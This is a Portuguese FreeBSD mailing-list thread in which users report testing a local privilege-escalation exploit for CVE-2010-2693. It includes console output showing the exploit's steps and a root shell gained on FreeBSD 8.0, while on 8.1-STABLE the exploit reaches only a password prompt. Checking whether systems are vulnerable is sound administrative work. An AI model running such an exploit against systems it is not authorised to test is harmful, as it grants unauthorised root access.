funciona no 8.1 nao garga: FreeBSD koopa.frederick.eti.br 8.1-STABLE FreeBSD 8.1-STABLE #0: Thu Aug 19 19:53:16 BRT 2010 r...@koopa.frederick.eti.br:/usr/src/sys/i386/compile/KOOPA i386
$ whoami frederick $ ./cve-2010-2693 [+] checking for setuid /usr/bin/su binary... [+] checking for suitable libc library in /lib... [+] found libc at /lib/libc.so.7 [+] found getuid function at 0x00049b08 [+] target: 0x00049b08, adjusted: 0x00049308, writes: 1171 [+] spawning listener thread... [+] connecting to listener thread... [+] initiating exploit via sendfile... [+] exploit complete! [+] spawning root shell... Password: Em 22/08/10 19:18, Renato Botelho escreveu: > 2010/8/22 Leandro Keffer<keffer...@gmail.com> > >> Testado em um 8.0 branch 3 e funcionando : ( >> >> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue >> May 25 20:54:11 UTC 2010 >> r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC >> amd64 >> >> [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 >> [+] checking for setuid /usr/bin/su binary... >> [+] checking for suitable libc library in /lib... >> [+] found libc at /lib/libc.so.7 >> [+] found getuid function at 0x00056990 >> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 >> [+] spawning listener thread... >> [+] connecting to listener thread... >> [+] initiating exploit via sendfile... >> [+] exploit complete! >> [+] spawning root shell... >> fbsd80# id >> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) >> >> > Sabe se rola no 8.1-RELEASE? > ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd